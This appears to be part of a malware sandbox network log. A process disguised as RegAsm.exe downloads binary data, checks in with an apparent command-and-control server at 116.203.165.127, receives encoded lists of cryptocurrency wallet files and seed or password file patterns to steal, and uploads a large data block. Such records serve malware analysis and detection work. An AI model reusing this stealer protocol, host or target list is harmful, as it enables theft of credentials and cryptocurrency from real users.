2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49757	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:57 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:57 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------HIJJDGDHDGDAKFIECFIJCont
2024-09-21 16:51:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49758	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:57 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------FHDAFIIDAKJDGDHIDAKJCont
2024-09-21 16:51:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:58 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49759	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:59 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:59 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------IECGHJKKJDHIEBFHCAKECont
2024-09-21 16:52:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:52:00 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49761	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:00 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:52:00 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------DGCAAAFCBFBAKFHJDBKJCont
2024-09-21 16:52:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:52:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:03 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 97901 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:52:03 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------BAEBGCFIEHCFIDGCAAFBCont
2024-09-21 16:52:03 UTC	16355	OUT	Data Raw: 6e 32 6f 47 49 65 61 4d 5a 70 66 30 70 4d 5a 2f 77 6f 41 54 38 50 7a 6f 36 30 55 70 6f 47 4e 78 78 33 70 4f 31 4f 50 76 53 47 6d 41 6c 42 48 72 52 30 6f 50 74 53 47 4a 2f 6b 30 67 2f 47 6e 48 6d 6d 30 77 51 5a 39 4d 55 48 38 2f 72 52 6d 6a 74 39 50 57 67 59 64 63 64 61 51 30 5a 77 50 65 6c 4a 47 61 41 45 50 54 70 53 59 70 65 6f 39 61 4d 63 30 44 45 37 47 6b 78 6a 74 53 34 6f 77 54 33 35 6f 47 4a 6e 4a 6f 70 53 63 6d 6b 6f 41 4f 39 4a 37 48 38 71 58 50 59 66 6c 53 66 79 39 36 41 44 70 51 4f 4f 39 4c 6a 4e 4a 69 67 59 55 6d 63 39 71 58 76 2f 41 44 6f 46 41 41 66 53 6b 2f 4b 6a 36 30 64 4b 42 69 59 2f 4c 32 6f 50 48 30 70 53 50 2f 31 30 68 47 44 32 6f 41 54 32 2f 6c 53 30 64 71 43 44 69 6b 46 7a 76 61 4b 4b 4b 67 2b 57 49 70 35 70 72 53 78 76 4c 32 48 55 62 Data Ascii: n2oGIeaMZpf0pMZ/woAT8Pzo60UpoGNxx3pO1OPvSGmAlBHrR0oPtSGJ/k0g/GnHmm0wQZ9MUH8/rRmjt9PWgYdcdaQ0ZwPelJGaAEPTpSYpeo9aMc0DE7GkxjtS4owT35oGJnJopScmkoAO9J7H8qXPYflSfy96ADpQOO9LjNJigYUmc9qXv/ADoFAAfSk/Kj60dKBiY/L2oPH0pSP/10hGD2oAT2/lS0dqCDikFzvaKKKg+WIp5prSxvL2HUb
2024-09-21 16:52:03 UTC	16355	OUT	Data Raw: 30 71 30 56 61 32 70 70 58 51 56 4c 79 5a 46 2b 36 73 6a 41 66 54 4e 59 48 69 51 41 32 45 52 37 69 55 44 39 44 57 75 57 4a 4a 4a 4f 53 65 54 58 50 38 41 69 4f 63 46 6f 59 41 65 6d 58 62 2b 6e 39 61 2f 4a 75 47 59 79 72 5a 78 53 63 4f 6a 62 39 46 5a 2f 77 44 44 48 31 48 45 4d 34 30 73 73 71 63 33 56 4a 66 4f 36 4d 4b 6b 35 70 61 4b 2f 61 7a 38 6a 43 75 63 31 54 2f 6b 49 79 2f 68 2f 49 56 30 64 63 39 71 66 47 70 53 45 6a 49 2b 55 34 50 66 67 56 34 75 65 2f 37 74 48 2f 45 76 79 5a 33 35 66 2f 46 66 70 2f 6b 65 74 65 45 31 6b 31 54 77 72 70 6d 70 61 68 61 72 4e 71 57 6e 69 59 61 61 48 66 42 6e 41 58 6a 39 65 50 38 41 67 49 4e 65 51 58 39 31 63 58 32 6f 58 46 31 64 73 57 75 4a 5a 43 30 68 49 77 63 35 35 2b 6c 62 64 7a 34 31 31 57 34 31 54 54 62 35 46 74 37 66 Data Ascii: 0q0Va2ppXQVLyZF+6sjAfTNYHiQA2ER7iUD9DWuWJJJOSeTXP8AiOcFoYAemXb+n9a/JuGYyrZxScOjb9FZ/wDDH1HEM40ssqc3VJfO6MKk5paK/az8jCuc1T/kIy/h/IV0dc9qfGpSEjI+U4PfgV4ue/7tH/EvyZ35f/Ffp/keteE1k1TwrpmpaharNqWniYaaHfBnAXj9eP8AgINeQX91cX2oXF1dsWuJZC0hIwc55+lbdz411W41TTb5Ft7f
2024-09-21 16:52:03 UTC	16355	OUT	Data Raw: 41 45 45 31 51 37 31 66 30 6e 2f 6a 2b 48 2b 34 2f 77 44 36 43 61 78 72 66 41 78 64 54 68 33 36 30 77 2f 6d 50 57 6e 74 79 54 55 5a 50 57 76 59 68 38 4b 4f 69 4f 77 30 38 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 39 4b 51 39 4d 30 66 35 35 6f 37 55 69 6a 30 43 69 69 69 73 44 35 51 4b 4b 36 32 30 38 46 72 64 57 55 46 78 2f 61 53 70 35 73 61 76 74 38 6b 6e 47 52 6e 48 57 6f 35 2f 43 2b 6d 57 73 7a 51 33 48 69 61 77 68 6c 58 47 59 35 53 71 73 4d 6a 49 79 43 32 65 68 72 78 34 35 76 47 54 Data Ascii: AEE1Q71f0n/j+H+4/wD6CaxrfAxdTh360w/mPWntyTUZPWvYh8KOiOw08GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P9KQ9M0f55o7Uij0CiiisD5QKK6208FrdWUFx/aSp5savt8knGRnHWo5/C+mWszQ3HiawhlXGY5SqsMjIyC2ehrx45vGT
2024-09-21 16:52:03 UTC	16355	OUT	Data Raw: 7a 51 54 78 2f 68 51 44 53 48 6e 33 70 41 4a 2b 56 4a 6e 36 6e 33 70 61 54 46 42 51 66 57 6b 49 2b 6c 4c 31 2f 4f 6b 50 76 51 41 67 35 39 76 65 69 67 44 6d 67 63 6d 67 59 6e 51 55 55 45 35 2b 6c 42 6f 47 65 69 30 55 55 56 6d 66 49 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 6f 6f 6f 6f 70 41 46 46 46 46 41 42 52 52 52 54 41 4b 4b 4b 4b 41 43 69 69 69 67 42 4b 4b 4b 4b 41 43 69 6c 37 55 6c 41 42 52 52 52 51 41 6c 46 4c 52 51 4d 53 69 69 6a 69 67 41 6f 70 61 4b 59 43 55 55 74 46 41 43 55 55 74 46 41 43 55 55 59 6f 6f 41 4b 4d 55 63 30 55 41 47 4b 4b 4b 4b 41 43 6a 46 47 4b 4b 41 45 6f 70 66 78 6f 34 39 61 4c 6a 45 6f 6f 79 4b 54 63 4b 4c 67 47 4b 4b 54 64 52 75 4e 49 4c 44 71 54 46 4a 6b 2b 74 4e 6f 48 59 66 77 4f 39 42 78 36 30 79 69 Data Ascii: zQTx/hQDSHn3pAJ+VJn6n3paTFBQfWkI+lL1/OkPvQAg59veigDmgcmgYnQUUE5+lBoGei0UUVmfIBRRRQAUUUUAFFFFABRRRQAoooopAFFFFABRRRTAKKKKACiiigBKKKKACil7UlABRRRQAlFLRQMSiijigAopaKYCUUtFACUUtFACUUYooAKMUc0UAGKKKKACjFGKKAEopfxo49aLjEooyKTcKLgGKKTdRuNILDqTFJk+tNoHYfwO9Bx60yi
